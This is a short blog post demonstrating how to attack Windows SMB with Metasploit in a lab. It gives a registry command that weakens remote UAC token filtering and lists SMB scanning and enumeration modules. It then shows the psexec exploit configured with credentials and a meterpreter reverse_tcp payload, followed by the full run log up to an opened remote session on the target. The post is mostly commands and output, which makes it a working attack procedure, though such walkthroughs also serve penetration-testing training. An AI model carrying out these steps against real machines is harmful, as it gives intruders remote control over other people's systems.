metasploit - smb

最新推荐文章于 2022-08-09 11:33:38 发布

Nixawk

最新推荐文章于 2022-08-09 11:33:38 发布

阅读量1.4k

点赞数

分类专栏： Pentesting Metasploit

本文链接：https://blog.csdn.net/nixawk/article/details/47680995

版权

Pentesting 同时被 2 个专栏收录

160 篇文章 1 订阅

订阅专栏

Metasploit

65 篇文章 1 订阅

订阅专栏

If you want to exploit smb locally, you need to modify regedit settings and reboot your computer.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"LocalAccountTokenFilterPolicy"=dword:00000001

Run cmd / Powershell with administrator privilege, and execute the command:

REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1

We can use the follow modules to exploit windows smb.

msf > use auxiliary/scanner/smb/
use auxiliary/scanner/smb/pipe_auditor
use auxiliary/scanner/smb/pipe_dcerpc_auditor
use auxiliary/scanner/smb/psexec_loggedin_users
use auxiliary/scanner/smb/smb2
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumusers_domain
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/smb_lookupsid
use auxiliary/scanner/smb/smb_uninit_cred
use auxiliary/scanner/smb/smb_version

Meterpreter will be used for demo.

msf exploit(psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOST                 192.168.1.101    yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             WORKGROUP        no        The Windows domain to use for authentication
   SMBPass               password         no        The password for the specified username
   SMBUser               nfs              no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.108    yes       The listen address
   LPORT     8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > run

[*] Started reverse handler on 192.168.1.108:8080 
[*] Connecting to the server...
[*] Authenticating to 192.168.1.101:445|WORKGROUP as user 'nfs'...
[*] Uploading payload...
[*] Created \DMiyfhpP.exe...
[+] 192.168.1.101:445 - Service started successfully...
[*] Deleting \DMiyfhpP.exe...
[*] Sending stage (885806 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.108:8080 -> 192.168.1.101:1079) at 2015-08-15 04:46:06 +0000

meterpreter > sysinfo 
Computer        : SECLAB
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32

References

https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex::Proto::SMB-Error-mean%3F

Nixawk

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
metasploit - smb

If you want to exploit smb locally, you need to modify regedit settings and reboot your computer.Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Polici
复制链接

扫一扫